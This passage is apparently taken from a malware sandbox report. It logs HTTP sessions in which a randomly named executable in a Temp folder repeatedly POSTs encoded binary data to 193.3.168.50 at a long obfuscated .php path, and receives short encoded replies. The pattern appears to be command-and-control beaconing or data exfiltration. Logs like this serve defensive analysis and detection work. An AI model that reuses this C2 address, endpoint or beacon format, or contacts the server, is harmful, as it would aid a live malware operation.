    Data Ascii: ZZZY\]ZUZXQRUSZ\PQ]_YZW@^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y/06<9? =.?=!*7-34',#"'><#0#(-#G $],5
Dec 5, 2024 10:54:01.580931902 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:01.813365936 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 09 11 25 1d 24 3b 28 1c 33 2c 24 09 2b 55 3c 13 2d 0a 23 11 24 2d 3d 0b 27 3a 2f 1e 3d 3a 01 11 36 04 25 05 3f 17 37 56 2b 37 30 56 29 02 20 58 00 1a 25 00 20 31 30 10 2d 2a 30 5d 25 5b 31 02 26 3e 39 5d 28 39 3f 1b 2a 33 34 53 31 00 0c 1a 29 23 3e 08 2d 34 3d 5e 3a 2d 31 07 25 2f 2a 52 0e 17 21 1b 3d 2d 3c 12 20 22 3e 08 3d 32 24 00 2b 59 2c 0e 24 5e 25 09 20 07 25 56 33 33 39 1f 24 1c 0f 0f 25 38 37 5b 31 01 3f 03 29 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 98%$;(3,$+U<-#$-=':/=:6%?7V+70V) X% 10-*0]%[1&>9](9?*34S1)#>-4=^:-1%/*R!=-< ">=2$+Y,$^% %V339$%87[1?) _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49784 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:00.463274002 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
    Host: 193.3.168.50
    Content-Length: 1060
    Expect: 100-continue
    Connection: Keep-Alive
Dec 5, 2024 10:54:00.815298080 CET | 1060 | OUT | Data Raw: 5a 5d 5f 53 59 5c 5a 5f 5a 58 51 52 55 50 5a 52 50 50 5d 5f 59 5c 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
    Data Ascii: Z]_SY\Z_ZXQRUPZRPP]_Y\WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ )( 582!9W-8'?#T5$.<E!#)-#G $],
Dec 5, 2024 10:54:01.700419903 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:01.933358908 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 05 Dec 2024 09:54:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49790 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:02.182672024 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:02.533929110 CET | 1060 | OUT | Data Raw: 5f 5d 5f 5d 5c 5d 5f 54 5a 58 51 52 55 5e 5a 5d 50 5e 5d 52 59 5e 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _]_]\]_TZXQRU^Z]P^]RY^WA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,&=:;#&/<=Y 9$:]'8R!2-X$#60S)#G $],
Dec 5, 2024 10:54:03.423392057 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:03.657381058 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49796 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:04.097999096 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:04.456852913 CET | 1060 | OUT | Data Raw: 5f 59 5f 5c 59 57 5a 50 5a 58 51 52 55 52 5a 5b 50 50 5d 59 59 53 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _Y_\YWZPZXQRURZ[PP]YYSWH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\._8 <90Y45=8)7,-?Z0,(U!"0=/"==#G $],1
Dec 5, 2024 10:54:05.335057974 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:05.573086977 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49802 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:05.806138039 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:06.159145117 CET | 1060 | OUT | Data Raw: 5f 5f 5f 53 59 56 5a 51 5a 58 51 52 55 5f 5a 5d 50 52 5d 58 59 52 57 40 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: ___SYVZQZXQRU_Z]PR]XYRW@^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/=^< 6:\;9Y#9?. ;\3Z$#:'$!+*-#G $],


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49803 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:06.938783884 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1936
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:07.284147024 CET | 1936 | OUT | Data Raw: 5f 51 5a 5f 59 5c 5a 55 5a 58 51 52 55 5e 5a 58 50 5e 5d 5d 59 5a 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _QZ_Y\ZUZXQRU^ZXP^]]YZWC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^8>=*47"]/,!4:+9#0</!1)'.<C5)=#G $],
Dec 5, 2024 10:54:08.175604105 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:08.409806013 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 09 11 26 02 24 15 23 0d 30 3c 2b 57 3c 23 28 5f 2d 23 3c 03 30 07 2d 42 32 2a 09 1f 3d 04 37 58 36 03 21 01 28 2a 38 0c 3c 27 2b 0a 28 28 20 58 00 1a 26 14 20 0b 30 5a 2e 00 2c 58 31 03 36 5d 24 04 26 03 2a 17 33 57 3d 33 2b 0b 31 07 2a 1b 29 30 2a 0d 3b 1a 29 15 3a 2d 2e 58 26 3f 2a 52 0e 17 22 09 2a 2e 20 58 37 08 3e 0e 28 32 3f 5d 3f 3f 2f 55 27 5e 21 08 23 3e 07 1c 24 30 36 0e 24 0c 35 0a 27 28 2b 5a 26 2f 0a 5d 2a 39 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98&$#0<+W<#(_-#<0-B2*=7X6!(*8<'+(( X& 0Z.,X16]$&*3W=3+1*)0*;):-.X&?*R"*. X7>(2?]??/U'^!#>$06$5'(+Z&/]*9 _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49804 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:07.059884071 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:07.408967972 CET | 1060 | OUT | Data Raw: 5a 5d 5f 5f 5c 5d 5a 57 5a 58 51 52 55 50 5a 5d 50 51 5d 5e 59 59 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: Z]__\]ZWZXQRUPZ]PQ]^YYWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.8#>(( ;<"#8-#X$/'#1*3X D"T)#G $],
Dec 5, 2024 10:54:08.298099995 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:08.533394098 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49810 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:09.049104929 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:09.393372059 CET | 1060 | OUT | Data Raw: 5f 59 5f 58 5c 59 5a 53 5a 58 51 52 55 53 5a 52 50 54 5d 5b 59 52 57 41 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _Y_X\YZSZXQRUSZRPT][YRWA^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.^/ >=)]4*,<14;9#$%,7T9_'-0A! (V)#G $],5
Dec 5, 2024 10:54:10.287276983 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:10.521159887 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49816 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:10.765209913 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:11.112150908 CET | 1060 | OUT | Data Raw: 5f 59 5f 52 59 5c 5a 5e 5a 58 51 52 55 5e 5a 59 50 56 5d 5c 59 5a 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _Y_RY\Z^ZXQRU^ZYPV]\YZWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/?_7#:8!9U. $<<W71%_0-0D##8V==#G $],
Dec 5, 2024 10:54:12.002557993 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:12.237816095 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49822 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:12.480917931 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:12.830893040 CET | 1060 | OUT | Data Raw: 5a 59 5a 5f 59 5f 5a 54 5a 58 51 52 55 50 5a 52 50 5e 5d 5a 59 5c 57 43 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: ZYZ_Y_ZTZXQRUPZRP^]ZY\WC^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.-#5<(]46\,/%!9(T,33]3/#%.8B!3?)=#G $],


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49823 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:13.546973944 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1908
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:13.937997103 CET | 1908 | OUT | Data Raw: 5a 59 5a 5c 59 5d 5a 52 5a 58 51 52 55 51 5a 53 50 51 5d 53 59 5d 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: ZYZ\Y]ZRZXQRUQZSPQ]SY]WI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;0_<:$[7P:Z,%Y#* -X$(S !>0-0"# V=-#G $],=
Dec 5, 2024 10:54:14.785610914 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:15.021601915 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 39 38 0d 0a 09 11 25 13 25 3b 2c 56 33 02 01 1a 3c 0d 27 06 39 0d 05 5e 33 3d 32 1d 32 03 3f 52 3d 03 34 01 36 3d 07 04 29 3a 34 0e 3f 09 37 0f 2a 12 20 58 00 1a 25 01 34 21 3b 05 2e 17 02 59 32 04 29 06 24 5b 29 14 2a 00 2b 50 3d 33 34 54 25 3e 04 57 3d 55 3e 09 3b 1a 3e 07 2e 00 00 1b 32 3f 2a 52 0e 17 21 51 3e 3e 28 12 23 57 25 55 2a 21 01 59 2b 2c 27 55 30 5e 3a 52 22 2d 26 0b 27 23 36 0d 33 32 31 0e 27 5e 28 00 25 01 30 5c 3e 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 98%%;,V3<'9^3=22?R=46=):4?7* X%4!;.Y2)$[)*+P=34T%>W=U>;>.2?*R!Q>>(#W%U*!Y+,'U0^:R"-&'#6321'^(%0\>) _. W1WT0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49824 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:13.669290066 CET | 441 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Connection: Keep-Alive
Dec 5, 2024 10:54:14.048043966 CET | 1060 | OUT | Data Raw: 5f 50 5f 59 59 58 5a 51 5a 58 51 52 55 54 5a 5e 50 51 5d 53 59 59 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _P_YYXZQZXQRUTZ^PQ]SYYWG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;)=)Z!%%,?9X4) U98$,R#T%_'?! ?>#G $],)
Dec 5, 2024 10:54:14.907636881 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:15.141366959 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49830 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:15.388012886 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: 193.3.168.50
Content-Length: 1060
Expect: 100-continue
Dec 5, 2024 10:54:15.737174988 CET | 1060 | OUT | Data Raw: 5f 5e 5f 53 59 5f 5f 50 5a 58 51 52 55 51 5a 53 50 5e 5d 5a 59 53 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
Data Ascii: _^_SY__PZXQRUQZSP^]ZYSWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,V%]?)X76./"4 ,07X$Z;!!%X3>C57)=#G $],=
Dec 5, 2024 10:54:16.625627995 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 5, 2024 10:54:16.861372948 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 Dec 2024 09:54:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4;Y\W0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49835 | 193.3.168.50 | 80 | 7244 | C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
Timestamp | Bytes transferred | Direction | Data
Dec 5, 2024 10:54:17.154334068 CET | 417 | OUT | POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
Content-Type: application/octet-stream
